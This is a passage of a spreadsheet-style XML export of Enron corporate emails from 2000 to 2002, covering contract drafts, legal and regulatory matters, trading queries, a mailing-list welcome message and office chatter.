fees.  Feel free to give me a call should you have any further questions._x000D_
Thanks._x000D_
_x000D_
Citibank, NA_x000D_
ABA 021000089_x000D_
A/C 3611-3293_x000D_
F/B/O 795184, Enron/Pegasus Escrow_x000D_
_x000D_
Estelle Lawrence_x000D_
Citibank Agency &amp; Trust_x000D_
111 Wall Street, 14/3_x000D_
New York, NY 10005_x000D_
T: 212.657.2076_x000D_
F: 212.657.3862_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 05:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: LV Cogen Turbine Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Lined against 3 sounds good.  Circulate to me, Bill, Dale, Lee, Kent _x000D_
Shoemaker._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;pthompson@akllp.com&gt; on 04/24/2001 12:24:57 PM_x000D_
To: &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: LV Cogen Turbine Agreement_x000D_
_x000D_
Once these changes are made (on Version 5) and the changes received from_x000D_
the contractor (currently in Version 4) are removed, do you want me to_x000D_
circulate a blackline against Version 3, which I believe was the last_x000D_
version seen by Lee Johnson? If so, who do you want to receive copies of_x000D_
Version 5 of the LV Cogen Agreement?   _x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Monday, April 23, 2001 6:41 PM_x000D_
To: Bill.Williams@enron.com_x000D_
Cc: Thompson, Peter J.; Dale.Rasmussen@enron.com_x000D_
Subject: Re: LV Cogen Turbine Agreement_x000D_
_x000D_
_x000D_
_x000D_
Pete,_x000D_
_x000D_
Finance has requested these changes:_x000D_
_x000D_
Notices to ENA as agent for E-Next._x000D_
_x000D_
Signature block should be for E-Next Generation, acting through its_x000D_
agent,_x000D_
Enron North America.  E Next will not be signing, as ENA will sign on_x000D_
its_x000D_
behalf.  Or, ENA, as agent for..._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Bill Williams@ECT_x000D_
04/23/2001 05:14 PM_x000D_
_x000D_
To:   "Thompson, Peter J." &lt;pthompson@akllp.com&gt; @ ENRON_x000D_
cc:   Kay Mann/Corp/Enron@Enron, Dale Rasmussen/HOU/ECT@ECT_x000D_
_x000D_
Subject:  Re: LV Cogen Turbine Agreement  (Document link: Kay Mann)_x000D_
_x000D_
Peter, from what I can see, the GE E NExt B/O rev 4 doc appears to be_x000D_
ok._x000D_
(Scope, $$$, and LDs)_x000D_
_x000D_
Please get it signed and the final distributed to us before April 30th._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 05:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan.junek@enron.com', 'scott.hendrickson@enron.com', 'dick.jenkins@enron.com', 'scott.goodell@enron.com'})</t>
  </si>
  <si>
    <t>fwd</t>
  </si>
  <si>
    <t xml:space="preserve">-_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Subject: Cute story_x000D_
_x000D_
_x000D_
Anyone who's been single and over the age of 18 can relate to this._x000D_
_x000D_
When I was younger I hated going to weddings ...it seemed that all of my_x000D_
_x000D_
aunts and the grandmotherly types used to come up to me, poking me in the_x000D_
_x000D_
ribs and cackling, telling me, 'You're next.'_x000D_
_x000D_
? They stopped that crap after_x000D_
_x000D_
I started doing the same thing to them at funerals._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Feb 2002 07:48:47 -0800 (PST)</t>
  </si>
  <si>
    <t>SCS OPENING NATURAL GAS OPTIONS STRADDLE UPDATE</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - 02.05.02.xls </t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 05:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Jury duty</t>
  </si>
  <si>
    <t>FYI. I have jury duty on Wednesday, Feb 14.  _x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 02:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: West Desk Christmas Dinner</t>
  </si>
  <si>
    <t>Ina:  from scheduling. the following people will attend tonight:_x000D_
_x000D_
Suzanne Christiansen_x000D_
Patti Sullivan_x000D_
Matt smith_x000D_
Ted Evans_x000D_
Jan Sutherland_x000D_
Stacey Brewer_x000D_
Hillary Mack_x000D_
Shelly Mendel._x000D_
_x000D_
As you know, I will not be attending.  Thanks for everything.</t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 08:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jross@susmangodfrey.com'})</t>
  </si>
  <si>
    <t>frozenset({'nmanne@susmangodfrey.com', 'jeffrey.t.hodge@enron.com', 'ansrew.edison@enron.com', 'richard.b.sanders@enron.com'})</t>
  </si>
  <si>
    <t>Citrus/Duke: Witness Summaries</t>
  </si>
  <si>
    <t>Attached is the draft witness list/summary.  Please read carefully for_x000D_
content and get back to me any comments.  It is to be sent to the other side_x000D_
Friday._x000D_
_x000D_
We have made a conscious decision to leave Wayne Perry and Mike McConnel off_x000D_
the list.  If anyone disagrees, please get back to me immediately._x000D_
_x000D_
_x000D_
 &lt;&lt;Doc1.wpd&gt;&gt;_x000D_
_x000D_
 - Doc1.wpd</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 03:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mary.ogden@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'david.kantenberger@enron.com'})</t>
  </si>
  <si>
    <t>Status of HPL wells at Bammel</t>
  </si>
  <si>
    <t>Dear David:  I'm assisting Gerald Nemec in HPL's Tx Railroad Commission _x000D_
(TxRRC) P-5 filing.  The TxRRC's files indicate that we have 2 inactive wells _x000D_
at Bammel, Field No. 05388270.  The two wells are:_x000D_
_x000D_
Pyles, Anna Unit, Lease/ID 04631 (1 well)_x000D_
Ehrhardt, John, Lease/ID 162241 (12 wells)_x000D_
_x000D_
If these wells are inactive but not plugged, we will need to obtain bonds for _x000D_
these wells.  Also, new TxRRC rules state that we must perform an "H-15 test" _x000D_
on these wells now.  _x000D_
_x000D_
Please tell me the status of these wells.  If they are plugged and abandoned, _x000D_
our compliance requirements may change.  If not, can you help us make sure _x000D_
that an "H-15 test" is performed and send me such proof so that I can satisfy _x000D_
the TxRRC requirements?_x000D_
_x000D_
Thanks in advance for your help, and please call me with questions or _x000D_
comments._x000D_
_x000D_
Best wishes,_x000D_
Mary_x000D_
_x000D_
Mary C. Ogden_x000D_
Legal Specialist_x000D_
Enron Wholesale Services/Enron Americas/Legal_x000D_
1400 Smith Street, EB 3876d_x000D_
Houston, TX  77002-7361_x000D_
Phone:  713-853-7796_x000D_
Fax:  713-646-3490_x000D_
Mary.Ogden@enron.com</t>
  </si>
  <si>
    <t>Tue, 17 Apr 2001 04:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/17/01; HourAhead hour: 12;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/17/01; HourAhead hour: 12;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041712.txt</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 05:00:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgaines1@swbell.net'})</t>
  </si>
  <si>
    <t>RE: latest file</t>
  </si>
  <si>
    <t>thanks_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sue Gaines [mailto:sgaines1@swbell.net]_x000D_
Sent: Wednesday, October 17, 2001 6:30 AM_x000D_
To: Burton, Katrina; Kean, Steven J.; Gaines, Sue_x000D_
Subject: latest file_x000D_
_x000D_
_x000D_
Katrina,_x000D_
 _x000D_
Here is the latest in case you get there before me. I have reattached all slides to the master. I"ll be there soon._x000D_
 _x000D_
Sue</t>
  </si>
  <si>
    <t>frozenset({'abcnewsnow-editor@mail.abcnews.go.com'})</t>
  </si>
  <si>
    <t>frozenset({'abcnews-l@list1.starwave.com'})</t>
  </si>
  <si>
    <t>Breaking News from ABCNEWS.com</t>
  </si>
  <si>
    <t>Breaking News from ABCNEWS.com_x000D_
_x000D_
Sent at 12:53 AM ET on Thursday October 25, 2001_x000D_
_x000D_
Second Case of Cutaneous Anthrax at NBC News, NYC Mayor Giuliani Says_x000D_
_x000D_
http://www.abcnews.go.com_x000D_
_x000D_
_x000D_
---- ADVERTISEMENT ----_x000D_
_x000D_
$899 INSTANT OFFICE, JUST ADD DESK, From Compaq _x000D_
_x000D_
Get the Compaq Evo(tm) D300s Desktop with Microsoft(R) Office XP SBE and an Intel Pentium(R) 4 processor with a 17" Compaq Monitor for just $899 (including free shipping). Or lease now and make no payments until February 2002.  Find out more at: http://transfer.go.com/cgi/transfer.pl?goto=http://www.compaq.com/breakingnews/899offer&amp;name=compaq4&amp;srvc=nws  _x000D_
_x000D_
-----------------------_x000D_
_x000D_
ABCNEWS.com:  Up to the Moment, Up to You (tm)_x000D_
http://abcnews.go.com_x000D_
---_x000D_
You received this mail because you subscribed via ABCNEWS.com. If you would like to stop receiving these mailings, log into our mailcenter at http://login.mailpref.go.com/unsubscribe ._x000D_
_x000D_
Please do not respond to this mail. Questions or comments can be submitted at _x000D_
http://abcnews.go.com/service/help/abccontact.html</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 09:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Sumas Index</t>
  </si>
  <si>
    <t xml:space="preserve">Enron has complained about the quality of the information given to Inside _x000D_
FERC.  It is my understanding that requesting the counterparty data is a due _x000D_
diligence step that the trades really happened and that Inside FERC keeps the _x000D_
name of the counterparty confidential.  We want the data to be as good as _x000D_
possible.  If my assumptions are correct, I come out -- give the name of the _x000D_
counterparty with stated limitations.  Jeff Hodge, please let me know if my _x000D_
assumptions are correct in the US._x000D_
_x000D_
_x000D_
_x000D_
	Peter Keohane_x000D_
	Sent by: Sharon Crawford_x000D_
	06/01/2001 02:56 PM_x000D_
		 _x000D_
		 To: Mark E Haedicke/HOU/ECT@ECT_x000D_
		 cc: Jonathan McKay/CAL/ECT@ECT, Rob Milnthorp/CAL/ECT@ECT_x000D_
		 Subject: Sumas Index_x000D_
_x000D_
Mark, our contracts at Sumas (which is a U.S. border delivery point in _x000D_
British Columbia) are settled against the Inside F.E.R.C. Sumas Index.  _x000D_
Inside F.E.R.C. is now requiring that, in addition to pure trading data, we _x000D_
must also provide counterparty identification.  On the basis that we cannot _x000D_
provide that counterparty identification, both due to contractual obligations _x000D_
and business policies/practices, our information was excluded from the Sumas _x000D_
Index for the last index period.  I know, for example, in negotiating the _x000D_
settlement with NGX, that the provision of counterparty identification was a _x000D_
matter of very serious concern, particularly for Andy Zipper who manages EOL._x000D_
_x000D_
However, I am advised by Jon McKay that, notwithstanding these apparent _x000D_
contractual restrictions and business policies/practices, Houston provides _x000D_
counterparty identifications to Inside F.E.R.C._x000D_
_x000D_
The problem is that if we do not provide these counterparty identifications, _x000D_
our information will be excluded from the Sumas Index, which is particularly _x000D_
problematic with Sumas already being a relatively illiquid point.  On the _x000D_
other hand, if we do provide counterparty identification, we run the risk of _x000D_
breaching confidentiality obligations, business policies/practices and _x000D_
upsetting our trading counterparties._x000D_
_x000D_
I guess we have two alternatives, one is to continue to not disclose _x000D_
counterparty identifications and hope that Inside F.E.R.C. will change its _x000D_
view on this (although, as I mentioned, their position is that Houston _x000D_
provides them with that information), or provide counterparty identifications _x000D_
at the risk of getting offside our counterparties._x000D_
_x000D_
My preference would be to do the former, but I think this is a matter you may _x000D_
want to review with Lavo and let me know how Houston intends to proceed._x000D_
_x000D_
Regards,_x000D_
Peter_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 06:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Missing deal?</t>
  </si>
  <si>
    <t xml:space="preserve">Tracy just told me this counterparty (PPL Montana) is still pending credit. _x000D_
Mike Swerzbin said he would prefer to wait this out, because he stands to _x000D_
make money on the deal. So in the meantime, I've been told by credit that we _x000D_
can't enter the deal in the system and calc it. I'm not sure how this works _x000D_
in your case with the Prebon check-out, but basically it's a pending credit _x000D_
deal that will potentially show up in our system once EPMI and PPL Montana _x000D_
reach an agreement. Does that help? Let me know._x000D_
_x000D_
Thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/13/2001 11:22 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
Hi Kate, what's the status of this deal?_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/12/2001 10:57 AM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
this deal is contingent on credit - he'll let me know later today whether or _x000D_
not it's a good trade._x000D_
_x000D_
thanks,_x000D_
Kate_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/12/2001 09:00 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
sorry Friday, 3/9_x000D_
_x000D_
_x000D_
_x000D_
   Kate Symes @ ECT                03/12/2001 10:52 AM_x000D_
_x000D_
To: Evelyn Metoyer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: Missing deal?_x000D_
  _x000D_
_x000D_
what was the trade date on this?_x000D_
_x000D_
_x000D_
_x000D_
Evelyn Metoyer@ENRON_x000D_
03/12/2001 08:58 AM_x000D_
To: Kate Symes/PDX/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Missing deal?_x000D_
_x000D_
_x000D_
_x000D_
Prebon sent over a confirm for a deal where:_x000D_
Enron (Mike Swerzbin) buys from PPL Montana Cal'04-Cal'06 25 mw of Mid-C at _x000D_
$45.00 off-peak hours._x000D_
_x000D_
They did not tell me about this deal during checkout.  Can you please check _x000D_
with Mike._x000D_
_x000D_
Thanks!!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 05:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.edmonds@truequote.com'})</t>
  </si>
  <si>
    <t>frozenset({'andy.zipper@enron.com', 'bob.shults@enron.com', 'travis.mccullough@enron.com', 'lkitchen@enron.com', 'gwhalle@enron.com'})</t>
  </si>
  <si>
    <t>True Quote &amp; EnronOnline</t>
  </si>
  <si>
    <t xml:space="preserve">With great pride, I ask you to click the link below and see the current_x000D_
status of the EnronOnline and truequote.com platforms.  Please feel free to_x000D_
contact me with any questions or comments!_x000D_
_x000D_
http://www.truequote.com/tqenron.htm_x000D_
_x000D_
Best regards,_x000D_
Chris_x000D_
_x000D_
_x000D_
__________________________________x000D_
Christopher S. Edmonds_x000D_
Chief Operating Officer_x000D_
True Quote LLC_x000D_
9931 Corporate Campus Drive_x000D_
Suite 2400_x000D_
Louisville, Kentucky 40223_x000D_
Phone:  502-212-4903_x000D_
Fax:      502-212-4907_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 May 2001 18:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'barbo@enron.com'})</t>
  </si>
  <si>
    <t>Request Closed: Access Request for paul.y'barbo@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">The request has been completed with all resources requested either completed or rejected. You can view the details of the  request by clicking http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000031940&amp;Page=MyReq._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sun, 28 Jan 2001 02:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Commissioner Hebert</t>
  </si>
  <si>
    <t xml:space="preserve">calendar and WGA meeting file_x000D_
----- Forwarded by Steven J Kean/NA/Enron on 01/28/2001 10:35 AM -----_x000D_
_x000D_
	Susan M Landwehr_x000D_
	01/26/2001 05:01 PM_x000D_
		 _x000D_
		 To: Paul Kaufman/PDX/ECT@ECT, James D Steffes/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Joe Hartsoe/Corp/Enron@ENRON, Linda _x000D_
Robertson/NA/Enron@ENRON, Steve Walton/HOU/ECT@ECT, Alan Comnes/PDX/ECT@ECT_x000D_
		 cc: Ginger Dernehl/NA/Enron@Enron, Maureen McVicker/NA/Enron@Enron, Lysa _x000D_
Akin/PDX/ECT@ECT, Marcia A Linton/NA/Enron@Enron, Lora _x000D_
Sullivan/Corp/Enron@ENRON, Steven J Kean/NA/Enron@Enron_x000D_
		 Subject: Commissioner Hebert_x000D_
_x000D_
Everyone---conference call on Monday Jan 29 at 2:15pm central time to discuss _x000D_
strategy for Steve Kean's participation in the Feb 2 meeting in Portland.  _x000D_
Please take a look at the materials that Alan Comnes sent out earlier today _x000D_
so that we can discuss which charts/information should be included in Kean's _x000D_
materials packet.  Call in number:_x000D_
_x000D_
 1-877-322-9654  pin #793474 host #299461          12:15 west/2:15 _x000D_
central/3:15 east_x000D_
_x000D_
_x000D_
Maureen--if Steve is able to join us after his 2:00 appointment that would be _x000D_
great--we should be able to narrow the discussion down a bit by the time he _x000D_
joins the call.  Thanks._x000D_
_x000D_
_x000D_
----- Forwarded by Susan M Landwehr/NA/Enron on 01/26/2001 04:53 PM -----_x000D_
_x000D_
	Susan M Landwehr_x000D_
	01/25/2001 08:45 PM_x000D_
		 _x000D_
		 To: Joe Hartsoe/Corp/Enron@ENRON, Linda Robertson/NA/Enron@ENRON, Steve _x000D_
Walton/HOU/ECT@ECT, Paul Kaufman/PDX/ECT@ECT, Richard Shapiro/NA/Enron@Enron_x000D_
		 cc: Ginger Dernehl/NA/Enron@Enron, Lysa Akin/PDX/ECT@ECT, Marcia A _x000D_
Linton/NA/Enron@Enron_x000D_
		 Subject: Commissioner Hebert_x000D_
_x000D_
Hey all---  Paul is meeting with Gov Kempthornes office tomorrow, so we _x000D_
should be able to let everyone know where we think the governors are heading _x000D_
and it would be good to share whatever info the folks in the DC office have _x000D_
gathered prior to the WGA meeting in Portland.  Could each of you please let _x000D_
me know if you are available for a conference call on Monday Jan 29th in the _x000D_
afternoon.  I'm thinking 2:00 central.  _x000D_
_x000D_
_x000D_
----- Forwarded by Susan M Landwehr/NA/Enron on 01/25/2001 08:35 PM -----_x000D_
_x000D_
	James D Steffes_x000D_
	01/22/2001 07:28 AM_x000D_
		 _x000D_
		 To: Joe Hartsoe/Corp/Enron@ENRON, Susan M Landwehr/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Linda Robertson/NA/Enron@ENRON, Steve _x000D_
Walton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Commissioner Hebert_x000D_
_x000D_
After the WGA meeting on Feb 2, maybe it would help to get Enron's team on _x000D_
Western matters back together to discuss who will call whom?  Sue, can you _x000D_
arrange the right time, etc.?_x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
----- Forwarded by James D Steffes/NA/Enron on 01/22/2001 07:26 AM -----_x000D_
_x000D_
	Susan M Landwehr_x000D_
	01/21/2001 11:22 PM_x000D_
		 _x000D_
		 To: James D Steffes/NA/Enron@Enron_x000D_
		 cc: Linda Robertson/NA/Enron@ENRON, Richard Shapiro/NA/Enron@Enron, Paul _x000D_
Kaufman/PDX/ECT@ECT, Jeff Dasovich/NA/Enron@Enron_x000D_
		 Subject: Commissioner Hebert_x000D_
_x000D_
Jim--I had a wide ranging social/business conversation with Curt Hebert on _x000D_
Saturday night at one of the inaugural events.  I'll call you to give you the _x000D_
details, including all the good things I said about you!!!  He was being _x000D_
quite negative about the WGA Feb 2 meeting in Portland, basically saying that _x000D_
his predecessor had committed to some positions that he was not in agreement _x000D_
with, and that he didn't think he wanted to participate.  I promised him that _x000D_
either you or I would call him after our Governor meetings this week to give _x000D_
him our sense of where the positions/players were going to shake out.  My _x000D_
initial thought was that we would want him there as a good voice on our side, _x000D_
but my second thought is that there might be a better strategy play not _x000D_
having FERC there.  As you saw by the e mail exchange last week between _x000D_
Cynthia Sandherr and me, the democrat senators Murray and Cantwell are also _x000D_
following this meeting, although I don't know if they are participating._x000D_
_x000D_
I'll call you tomorrow and fill you in on the conversation_x000D_
_x000D_
Linda--I also made a small commitment on tobacco issues that I'll need to _x000D_
talk to you about!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 09:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Articles</t>
  </si>
  <si>
    <t>For your reading pleasure..._x000D_
_x000D_
AOL/Time Warner Merger:  12/13/00_x000D_
http://news.cnet.com/news/0-1005-200-4134177.html?tag=st.ne.ron.lthd_x000D_
_x000D_
_x000D_
_x000D_
Margo Reyna_x000D_
Regulatory Analyst_x000D_
Enron Corp., Government Affairs_x000D_
Phone:  713-853-9191</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 11:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Please deleate me from this list _x000D_
_x000D_
_x000D_
Douglas R. Brawley _x000D_
Pacific Northwest Generating Cooperative _x000D_
503.288.5555 _x000D_
_x000D_
_x000D_
_x000D_
	"Dalia, Keith A - TOS-DITT1" &lt;kadalia@BPA.GOV&gt; _x000D_
	Sent by: RTO West Regional Representatives Group &lt;RRGA-L@LIST.RTOWEST.ORG&gt; _x000D_
	_x000D_
	05/15/01 04:39 PM _x000D_
	Please respond to RTO West Regional Representatives Group _x000D_
		? ? ? ? _x000D_
		? ? ? ? To: ? ? ? ?RRGA-L@LIST.RTOWEST.ORG _x000D_
		? ? ? ? cc: ? ? ? ? _x000D_
		? ? ? ? Subject: ? ? ? ?_x000D_
_x000D_
_x000D_
You have been added to the RRGA-L mailing list (RTO West Congestion Model_x000D_
Content Group) by Keith Dalia &lt;kadalia@BPA.GOV&gt;._x000D_
_x000D_
Please save this message for future ?reference, especially if this is the_x000D_
first time you subscribe to an ?electronic mailing list. If you ever need_x000D_
to ?leave the ?list, ?you ?will find ?the ?necessary instructions ?below._x000D_
Perhaps ?more importantly, ?saving a ?copy of ?this message ?(and of ?all_x000D_
future subscription notices ?from other mailing lists) in ?a special mail_x000D_
folder will give you instant access to the list of mailing lists that you_x000D_
are subscribed ?to. This may ?prove very useful the ?next time you ?go on_x000D_
vacation and ?need to leave ?the lists temporarily so ?as not to ?fill up_x000D_
your ?mailbox while ?you ?are away! ?You should ?also ?save the ?"welcome_x000D_
messages" from the ?list owners that you will ?occasionally receive after_x000D_
subscribing to a new list._x000D_
_x000D_
To send ?a message to ?all the people ?currently subscribed to ?the list,_x000D_
just send mail ?to RRGA-L@LIST.RTOWEST.ORG. This is ?called "sending mail_x000D_
to the ?list", because ?you send ?mail to a ?single address ?and LISTSERV_x000D_
makes ?copies ?for all ?the ?people ?who ?have subscribed. ?This ?address_x000D_
(RRGA-L@LIST.RTOWEST.ORG) ?is also ?called the ?"list address". ?You must_x000D_
never try to send any command to that address, as it would be distributed_x000D_
to all the people ?who have subscribed. All commands must ?be sent to the_x000D_
"LISTSERV ?address", ? LISTSERV@LIST.RTOWEST.ORG. ?It ? is ?very_x000D_
important to understand ?the difference between the ?two, but fortunately_x000D_
it is ?not complicated. The ?LISTSERV address is ?like a FAX ?number that_x000D_
connects you ?to a ?machine, whereas ?the list address ?is like ?a normal_x000D_
voice line connecting you to a person. If you make a mistake and dial the_x000D_
FAX number ?when you ?wanted to talk ?to someone on ?the phone, ?you will_x000D_
quickly realize ?that you used the ?wrong number and call ?again. No harm_x000D_
will have been done. If on the ?other hand you accidentally make your FAX_x000D_
call ?someone's ?voice ?line, ?the ?person receiving ?the ?call ?will ?be_x000D_
inconvenienced, especially if your FAX then re-dials every 5 minutes. The_x000D_
fact that ?most people ?will eventually ?connect the ?FAX machine ?to the_x000D_
voice line to ?allow the FAX to ?go through and make the ?calls stop does_x000D_
not mean ?that you ?should continue ?to send FAXes ?to the ?voice number._x000D_
People would just get mad at you. ?It works pretty much the same way with_x000D_
mailing ?lists, with ?the difference ?that ?you are ?calling hundreds ?or_x000D_
thousands of people ?at the same time, and consequently ?you can expect a_x000D_
lot of people to get upset if ?you consistently send commands to the list_x000D_
address._x000D_
_x000D_
You may leave the list at any ?time by sending a "SIGNOFF RRGA-L" command_x000D_
to LISTSERV@LIST.RTOWEST.ORG. You can also tell LISTSERV how you_x000D_
want it to confirm ?the receipt of messages you send to ?the list. If you_x000D_
do not trust ?the system, send a "SET RRGA-L ?REPRO" command and LISTSERV_x000D_
will send you a ?copy of your own messages, so that you ?can see that the_x000D_
message was distributed and did not get damaged on the way. After a while_x000D_
you ?may find ?that this ?is getting ?annoying, especially ?if your ?mail_x000D_
program does not ?tell you that the ?message is from you ?when it informs_x000D_
you that new mail has arrived from ?RRGA-L. If you send a "SET RRGA-L ACK_x000D_
NOREPRO" command, LISTSERV will mail you a short acknowledgement instead,_x000D_
which ?will look ?different in ?your ?mailbox directory. ?With most ?mail_x000D_
programs you ?will know immediately ?that this is an ?acknowledgement you_x000D_
can read ?later. Finally, ?you can ?turn off ?acknowledgements completely_x000D_
with "SET RRGA-L NOACK NOREPRO"._x000D_
_x000D_
Following ?instructions from ?the list ?owner, your ?subscription options_x000D_
have been set to "NOFILES REPRO" rather than the usual LISTSERV defaults._x000D_
For more ?information about subscription ?options, send a ?"QUERY RRGA-L"_x000D_
command to LISTSERV@LIST.RTOWEST.ORG._x000D_
_x000D_
Contributions sent to this list are automatically archived. You can get a_x000D_
list of the available archive files ?by sending an "INDEX RRGA-L" command_x000D_
to ?LISTSERV@LIST.RTOWEST.ORG. You ?can then ?order these ?files_x000D_
with a "GET RRGA-L LOGxxxx" ?command, or using LISTSERV's database search_x000D_
facilities. Send an ?"INFO DATABASE" command for more ?information on the_x000D_
latter._x000D_
_x000D_
This ?list is ?available ?in digest ?form. ?If you ?wish ?to receive ?the_x000D_
digested version of the postings, just issue a SET RRGA-L DIGEST command._x000D_
_x000D_
Please note that ?it is presently possible for other ?people to determine_x000D_
that ?you are ?signed up ?to the ?list through ?the use ?of the ?"REVIEW"_x000D_
command, ?which ?returns ? the ?e-mail ?address ?and ?name ? of ?all ?the_x000D_
subscribers. If ?you do not ?want your name to ?be visible, just ?issue a_x000D_
"SET RRGA-L CONCEAL" command._x000D_
_x000D_
More ?information on ?LISTSERV ?commands ?can be ?found ?in the ?LISTSERV_x000D_
reference ?card, which ?you can ?retrieve ?by sending ?an "INFO ?REFCARD"_x000D_
command to LISTSERV@LIST.RTOWEST.ORG._x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kunreuth@wharton.upenn.edu'})</t>
  </si>
  <si>
    <t>Re: Status of Enron Project</t>
  </si>
  <si>
    <t xml:space="preserve">Howard,_x000D_
_x000D_
Sorry for the delay._x000D_
_x000D_
I shall be able to get back to you next week. A very interesting new research _x000D_
idea came up_x000D_
and we have to close a few loops internally.  _x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Kunreuther, Howard" &lt;kunreuth@wharton.upenn.edu&gt; on 04/05/2001 08:42:44 PM_x000D_
To: "Kaminski (E-mail)" &lt;vkamins@enron.com&gt;_x000D_
cc: "Kleindorfer, Paul" &lt;kleindorfer@wharton.upenn.edu&gt; _x000D_
Subject: Status of Enron Project_x000D_
_x000D_
_x000D_
Hi Vince:_x000D_
_x000D_
Just a short note to indicate that we have not heard received any information _x000D_
from your group since our discussion at Wharton in February. We look forward _x000D_
to get some information on what issues you would like us to spend some time _x000D_
thinking about._x000D_
_x000D_
Hope all is well._x000D_
_x000D_
Regards,_x000D_
_x000D_
Howard_x000D_
_x000D_
 Howard Kunreuther_x000D_
Cecilia Yen Koo Professor of Decisions Sciences and Public Policy_x000D_
Chairperson   Operations and Information Management Department_x000D_
1326 Steinberg Hall-Dietrich Hall_x000D_
Wharton School_x000D_
University of Pennsylvania_x000D_
Philadelphia, PA 19104-6366_x000D_
Phone:215-898-4589_x000D_
FAX:215-573-2130_x000D_
Email:kunreuth@wharton.upenn.edu_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Oct 2001 11:18:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grace.taylor@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'dana.davis@enron.com', 'kelly.ellis@enron.com', 'renee.ingram@enron.com', 'nicole.mendez@enron.com'})</t>
  </si>
  <si>
    <t>FW: FW: I had you on my heart</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bob, Vanessa  _x000D_
Sent:	Friday, October 12, 2001 12:12 PM_x000D_
